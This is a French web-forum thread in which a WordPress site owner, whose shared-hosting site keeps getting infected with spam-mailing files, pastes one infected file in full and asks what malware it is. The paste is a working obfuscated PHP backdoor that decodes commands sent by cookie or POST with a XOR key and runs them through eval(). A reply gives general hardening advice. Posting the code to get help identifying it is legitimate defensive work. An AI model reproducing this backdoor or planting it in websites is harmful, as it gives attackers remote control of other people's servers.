Malware sur Wordpress !

WRInaute impliqué
Bonjour,
J'ai un site hébergé sur une offre mutualisé Wordpress, à chaque fois (2 à 3 fois par an) mon site est infecté, je trouve des fichiers qui envoient des emails en masse dans le FTP (un peu partout dans les modules, les fichiers wordpress etc ...
Voici le type de code que contient ces fichiers malwares :

Code:
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['x71a2d93'] = "\x43\x9\x71\x40\x2c\x36\x2b\x7d\x27\x70\x73\x60\x45\x7b\x58\x2a\x5b\x21\x28\x33\x5f\x6d\x4b\x20\x34\x3b\x22\x26\x6a\x79\x59\x77\x4f\x44\x67\x35\x54\x25\x2e\x69\x39\x4e\xd\x32\x4c\x62\x3d\x63\x7e\x66\x65\x41\x57\x49\x24\x31\x50\x68\x3a\x7c\x7a\x46\x6c\x5e\x75\x2d\x48\x5d\x30\x78\x53\x56\x5a\x5c\x6e\x3c\x3f\x4d\x55\x72\x42\x37\x4a\x51\x76\x47\x23\x52\x2f\x29\x38\x6b\x61\x64\xa\x6f\x74\x3e";
$GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40]] = $GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][79];
$GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]] = $GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][93];
$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][74];
$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][96];
$GLOBALS[$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][43]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][60].$GLOBALS['x71a2d93'][50];
$GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][43]] = $GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][84].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][74];
$GLOBALS[$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68]] = $GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][60].$GLOBALS['x71a2d93'][50];
$GLOBALS[$GLOBALS['x71a2d93'][91].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][50];
$GLOBALS[$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][24]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][96];
$GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81]] = $GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][90];
$GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]] = $GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][35];
$GLOBALS[$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][24]] = $_POST;
$GLOBALS[$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92]] = $_COOKIE;
@$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][34], NULL);
@$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][34].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][10], 0);
@$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][69].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][69].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][50], 0);
@$GLOBALS[$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][24]](0);

$hadb04790 = NULL;
$j1b154b2 = NULL;

$GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][90]] = $GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][24];
global $sa68;

function ucda1dd65($hadb04790, $r4e7)
{
    $u9b4c = "";

    for ($vd66f6=0; $vd66f6<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($hadb04790);)
    {
        for ($da2388=0; $da2388<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($r4e7) && $vd66f6<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($hadb04790); $da2388++, $vd66f6++)
        {
            $u9b4c .= $GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40]]($GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]]($hadb04790[$vd66f6]) ^ $GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]]($r4e7[$da2388]));
        }
    }

    return $u9b4c;
}

function q1bd628($hadb04790, $r4e7)
{
    global $sa68;

    return $GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]]($GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]]($hadb04790, $sa68), $r4e7);
}

foreach ($GLOBALS[$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92]] as $r4e7=>$ccfa5)
{
    $hadb04790 = $ccfa5;
    $j1b154b2 = $r4e7;
}

if (!$hadb04790)
{
    foreach ($GLOBALS[$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][24]] as $r4e7=>$ccfa5)
    {
        $hadb04790 = $ccfa5;
        $j1b154b2 = $r4e7;
    }
}

$hadb04790 = @$GLOBALS[$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68]]($GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81]]($GLOBALS[$GLOBALS['x71a2d93'][91].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47]]($hadb04790), $j1b154b2));
if (isset($hadb04790[$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][91]]) && $sa68==$hadb04790[$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][91]])
{
    if ($hadb04790[$GLOBALS['x71a2d93'][92]] == $GLOBALS['x71a2d93'][39])
    {
        $vd66f6 = Array(
            $GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][84] => @$GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][43]](),
            $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][84] => $GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][38].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][55],
        );
        echo @$GLOBALS[$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][43]]($vd66f6);
    }
    elseif ($hadb04790[$GLOBALS['x71a2d93'][92]] == $GLOBALS['x71a2d93'][50])
    {
        eval($hadb04790[$GLOBALS['x71a2d93'][93]]);
    }
    exit();
}

Avez vous une idée de ce type de malware et sa provenance ?
Merci
 
Membre Honoré
Bonjour,

Il faudrait vérifier le site (URL), habituellement c'est un problème de plugin.
Sinon avoir le WordPress à jour, ainsi que les modules est habituellement suffisant.
Vous pouvez vérifier aussi les autres sites que vous hébergez via le même espace.

N'hésitez pas entre deux messages à présenter aussi vos avis sur les sujets du forum :
https://www.webrankinfo.com/forum/f/demandes-davis-et-de-conseils-sur-vos-sites.36/
pour aider les autres personnes de la communauté d'entraide.

Cordialement.
 
Discussions similaires
Haut